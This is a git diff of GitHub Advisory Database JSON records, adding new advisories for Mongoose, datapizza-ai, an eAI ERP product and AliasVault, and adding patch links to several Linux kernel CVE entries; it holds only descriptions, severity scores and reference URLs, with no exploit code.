+1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9wwr-2jh3-482p", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23220" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23220" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/010eb01ce23b34b50531448b0da391c7f05a72af" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/5accdc5b7f28a81bbc5880ac0b8886e60c86e8c8" diff --git a/advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json b/advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json new file mode 100644 index 0000000000000..b82d92829126e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c6h3-vh8h-r8mj", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2967" + ], + "details": "A security vulnerability has been detected in Cesanta Mongoose up to 7.20. This affects the function getpeer of the file /src/net_builtin.c of the component TCP Sequence Number Handler. The manipulation leads to improper verification of source of a communication channel. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2967" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/tcp_rst.md" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/tcp_rst.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347334" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347334" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755450" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-940" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T04:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json index ab6050886d9c6..4e8b862c68e8b 100644 --- a/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json +++ b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f7pj-q7w5-89fg", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71236" @@ -41,6 +41,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/a46f81c1e627437de436e517f5fd4b725c15a1e6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b6df15aec8c3441357d4da0eaf4339eb20f5999f" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json index d0f1a3d713ba5..69d0bea00039b 100644 --- a/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json +++ b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g3vh-wfh4-fp76", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23227" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/0cd2c155740dbd00868ac5a8ae5d14cd6b9ed385" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/52b330799e2d6f825ae2bb74662ec1b10eb954bb" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/60b75407c172e1f341a8a5097c5cbc97dbbdd893" diff --git a/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json index 39c71f21b1a2e..24773e971f897 100644 --- a/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json +++ b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h437-rr98-fx56", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23223" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23223" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1c253e11225bc5167217897885b85093e17c2217" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/1d411278dda293a507cb794db7d9ed3511c685c6" diff --git a/advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json b/advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json new file mode 100644 index 0000000000000..0a1cca9e9509b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hg58-x52p-859c", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2970" + ], + "details": "A vulnerability has been found in datapizza-labs datapizza-ai 0.0.2. Affected by this vulnerability is the function RedisCache of the file datapizza-ai-cache/redis/datapizza/cache/redis/cache.py. Such manipulation leads to deserialization. The attack requires being on the local network. A high complexity level is associated with this attack. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2970" + }, + { + "type": "WEB", + "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/unsafe-deserialization.md" + }, + { + "type": "WEB", + "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/unsafe-deserialization.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347337" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347337" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755363" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T05:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json b/advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json new file mode 100644 index 0000000000000..a9b7be723fbc9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hm88-j5r4-fwj3", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2998" + ], + "details": "ERP developed by eAI Technologies has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a crafted DLL file in the same directory as the program, thereby executing arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2998" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10723-14549-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10722-db7cb-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T04:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json b/advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json new file mode 100644 index 0000000000000..b384fc8f4ab69 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hx47-q2x9-r28j", + "modified": "2026-02-23T06:30:19Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2974" + ], + "details": "A vulnerability was identified in AliasVault App up to 0.25.3 on Android/iOS. This vulnerability affects unknown code of the file shared_prefs/aliasvault.xml of the component Backup Handler. The manipulation of the argument accessToken/refreshToken/metadata/key_derivation_params/auth_methods leads to exposure of backup file to an unauthorized control sphere. An attack has to be approached locally. The attack is considered to have high complexity. It is stated that the exploitability is difficult. The exploit is publicly available and might be used. Upgrading to version 0.26.0 is able to resolve this issue. The identifier of the patch is 873ecc03f92238e162f98a068ad56069a922b4f6/0bd662320174d8265dfe3b05a04bc13efc960532. It is recommended to upgrade the affected component. The creator of the software explains: \"Because of AliasVault's zero-knowledge encryption design, the tokens stored in aliasvault.xml are API session tokens that cannot decrypt the vault on their own: the master password is required for that. So while this isn't a direct vault compromise risk, there's no reason to include them in backups either.\"", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2974" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/issues/1497" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/issues/1497#issue-3855176470" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/pull/1499" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/commit/873ecc03f92238e162f98a068ad56069a922b4f6" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/releases/tag/0.26.0" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347340" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347340" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756058" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756059" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T06:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json index e05a54ac69d1c..b5cac77372278 100644 --- a/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json +++ b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6h2-wr53-6vcg", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23228" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/6dd2645cf080a75be31fa66063c7332b291f46f0" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/77ffbcac4e569566d0092d5f22627dfc0896b553" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/787769c8cc50416af7b8b1a36e6bcd6aaa7680aa" diff --git a/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json index d5ec8b9ffcd23..0c719f64b5153 100644 --- a/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json +++ b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j87r-wgfm-7fjj", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23229" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/8ee8ccfd60bf17cbdab91069d324b5302f4f3a30" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b505047ffc8057555900d2d3a005d033e6967382" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/c0a0ded3bb7fd45f720faa48449a930153257d3a" diff --git a/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json index 38ae638eb1509..687f68c233a63 100644 --- a/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json +++ b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jp99-8xc8-367m", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23221" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23221" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/148891e95014b5dc5878acefa57f1940c281c431" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/1d6bd6183e723a7b256ff34bbb5b498b5f4f2ec0" diff --git a/advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json b/advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json new file mode 100644 index 0000000000000..0fa953c2302e8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jprc-mg35-68jq", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2968" + ], + "details": "A vulnerability was detected in Cesanta Mongoose up to 7.20. This impacts the function mg_chacha20_poly1305_decrypt of the file /src/tls_chacha20.c of the component Poly1305 Authentication Tag Handler. The manipulation results in improper verification of cryptographic signature. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is said to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2968" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/ChaCha20Poly1305.md" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/ChaCha20Poly1305.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347335" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347335" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757091" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T04:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json index 315370750f042..e78395a210e50 100644 --- a/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json +++ b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m34c-wrf8-mw69", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71237" @@ -41,6 +41,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/ea2278657ad0d62596589fbe2caf995e189e65e7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ed527ef0c264e4bed6c7b2a158ddf516b17f5f66" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json index ea6059e047666..a135a1f5fe37f 100644 --- a/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json +++ b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mx4x-pxgm-r77w", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71231" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71231" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/48329301969f6d21b2ef35f678e40f72b59eac94" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/c77b33b58512708bd5603f48465f018c8b748847" diff --git a/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json index f43c4e522439a..356c8102d352a 100644 --- a/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json +++ b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p525-h9pq-233r", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23225" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23225" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1e83ccd5921a610ef409a7d4e56db27822b4ea39" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/81f29975631db8a78651b3140ecd0f88ffafc476" diff --git a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json index 269fd606d633f..69821a25b2ffd 100644 --- a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json +++ b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p68h-c56f-p3v6", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23230" @@ -33,6 +33,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/c4b9edd55987384a1f201d3d07ff71e448d79c1b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ec306600d5ba7148c9dbf8f5a8f1f5c1a044a241" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json b/advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json new file mode 100644 index 0000000000000..ac56b773b36ac --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5xx-fxv3-xxqf", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2969" + ], + "details": "A flaw has been found in datapizza-labs datapizza-ai 0.0.2. Affected is the function ChatPromptTemplate of the file datapizza-ai-core/datapizza/modules/prompt/prompt.py of the component Jinja2 Template Handler. This manipulation of the argument Prompt causes improper neutralization of special elements used in a template engine. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2969" + }, + { + "type": "WEB", + "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/ssti.md" + }, + { + "type": "WEB", + "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/ssti.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347336" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347336" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755357" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-791" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T05:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json index 940a4d6d2b01d..2066752adde8c 100644 --- a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json +++ b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w94g-pmcx-r454", - "modified": "2026-02-18T18:30:39Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:39Z", "aliases": [ "CVE-2025-71229" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71229" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0177aa828d966117ea30a44f2e1890fdb356118e" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/13394550441557115bb74f6de9778c165755a7ab" From a1043d8fc44ceb8bf9188e61d53ec0b0a373003d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 09:33:10 +0000 Subject: [PATCH 51/77] Advisory Database Sync --- .../GHSA-5c8j-7c6c-838x.json | 13 ++++- .../GHSA-h62q-wxxr-4qqj.json | 13 ++++- .../GHSA-wrw2-8vg5-g3jj.json | 13 ++++- .../GHSA-6w8q-wgfc-hxx8.json | 6 +- .../GHSA-hx75-3jr9-944m.json | 6 +- .../GHSA-cmrr-4p45-4xv3.json | 6 +- .../GHSA-fh2m-jrq8-h6q5.json | 6 +- .../GHSA-j86w-j9vr-w3pm.json | 6 +- .../GHSA-qx2w-wx28-8mhv.json | 6 +- .../GHSA-f75p-j579-8r2c.json | 6 +- .../GHSA-j6v8-rcm6-wxr2.json | 6 +- .../GHSA-r92f-q253-q9wv.json | 6 +- .../GHSA-24q2-4vqq-qcx6.json | 6 +- .../GHSA-752c-24px-69m9.json | 8 ++- .../GHSA-mq99-fg37-h9r3.json | 8 ++- .../GHSA-xgf2-5w76-r5jg.json | 6 +- .../GHSA-g4w4-pwm7-7rv4.json | 6 +- .../GHSA-94c6-66pj-36g9.json | 6 +- .../GHSA-fx24-f32v-56xf.json | 6 +- .../GHSA-g25q-jw4h-pppq.json | 6 +- .../GHSA-566r-vx98-9rr7.json | 8 ++- .../GHSA-94xm-wg2w-cvfq.json | 8 ++- .../GHSA-r2vj-428g-v68v.json | 8 ++- .../GHSA-cccf-mjv6-phwq.json | 6 +- .../GHSA-v3xm-8fcm-8j8q.json | 8 ++- .../GHSA-xjc5-m98p-6f2c.json | 8 ++- .../GHSA-4mcp-5qpc-wgf8.json | 6 +- .../GHSA-r32c-fmcr-34r3.json | 6 +- .../GHSA-25w3-vxr6-gm5r.json | 6 +- .../GHSA-27fq-8xxm-gqgw.json | 18 +++++- .../GHSA-29jx-3q54-p8gq.json | 18 +++++- .../GHSA-2gmr-vqp5-r9qg.json | 6 +- .../GHSA-2m9v-rwcf-g57m.json | 10 +++- .../GHSA-2qfg-m3c3-m867.json | 6 +- .../GHSA-359g-wg43-pfv8.json | 6 +- .../GHSA-3vj5-3fjj-88m8.json | 6 +- .../GHSA-4696-58w6-rqw4.json | 6 +- .../GHSA-4mf2-6634-xrph.json | 10 +++- .../GHSA-4p7v-9jxw-m3mp.json | 6 +- .../GHSA-5j8r-5f3r-4w9p.json | 6 +- .../GHSA-67vh-536w-6pc4.json | 6 +- .../GHSA-6cvf-4x5f-rv59.json | 6 +- .../GHSA-6fpp-9pqw-wr8m.json | 6 +- .../GHSA-6q3r-7qmf-2jrm.json | 6 +- .../GHSA-74rr-mvxh-jvg7.json | 6 +- .../GHSA-79xr-h873-2v98.json | 6 +- .../GHSA-7x8v-q8wp-hcg7.json | 6 